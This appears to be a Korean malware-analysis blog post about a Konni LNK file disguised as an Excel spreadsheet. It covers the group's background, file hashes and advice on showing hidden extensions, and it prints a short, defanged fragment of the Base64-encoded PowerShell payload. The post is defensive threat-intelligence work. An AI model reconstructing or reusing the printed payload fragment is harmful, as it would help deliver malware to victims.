lazarusholic

2024-06-03, Sakai
http://wezard4u.tistory.com/6826
#Konni #LNK

오늘도 우리 북한의 해킹 그룹인 Konni(코니)에서 만든 악성코드인 김명희_20240515.xlsx(2024.5.16)ㅇ에 댛패 글을 적어 보겠습니다. 2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체이며 Kimsuky(김수키)일 가능성도 있는 단체입니다. 그룹은 북한에 본부를 두고 있는 것으로 추정되며 한국과 미국의 정부 기관 및 조직을 표적으로 삼는 것으로 알려졌으며 북한 해커 그룹은 피싱 메시지나 이메일을 통해 Konni RAT를 배포하며 공격자는 Konni RAT를 사용하여 피해자로부터 정보를 수집하고, 스크린샷을 캡처하고, 파일을 훔치고, 원격 대화형 셸을 구축합니다. KONNI는 러시아, 동아시아, 유럽, 중동의 정치 집단을 표적으로 한 다양한 북한 공격 혐의와 연관되어 있음
일단 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:김명희_20240515.xlsx.lnk
사이즈:9.76 KB
MD5:0993cf18121be84f5b1511318df80f44
SHA-1:05b26db4fca3c8a735517b3979962aa1d5125273
SHA-256:21900e37d1184093e2333fe7931a8a5c217aa5fd24cfd7650bc6fadbb31f7d8ad
전에도 글을 적었다시피 아이콘을 잘 보면 정상적인 엑셀 파일이 아닌 것을 확인할 수가 있으며 lnk 확장들을 확인하기 위해서 탐색기에서 옵션->폴더 옵션->보기로 이동을 해서 숨긴 파일, 폴더 및 드라이브 표시에 체크를 해서 사용을 하는 습관을 가지는 것을 대단히 권장한다고 했습니다. 아니 해당 기능은 필수입니다.
Base64 디코딩 전
JGxua3BhdGggPS(B)HZXQtQ2hpbGRJdG(V)tICoubG5rIHwgd2hlcmUt b(2)JqZWN0IHskXy5sZW5ndGggLWVxICR0bH0gfCBTZWxlY3QtT2Jq(Z )WN0IC1FeHBh(b)mRQcm9wZXJ0eSBOYW1lOyB(p)ZigkbG5rcGF0aC5jb3V dCAtZXEgMCl7JGxua3BhdGggPSBHZXQtQ2hp(b)GRJdGVtICRlbnY(6)VEVN UFwqXCoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH07 …

05b26db4fca3c8a735517b3979962aa1d5125273
0993cf18121be84f5b1511318df80f44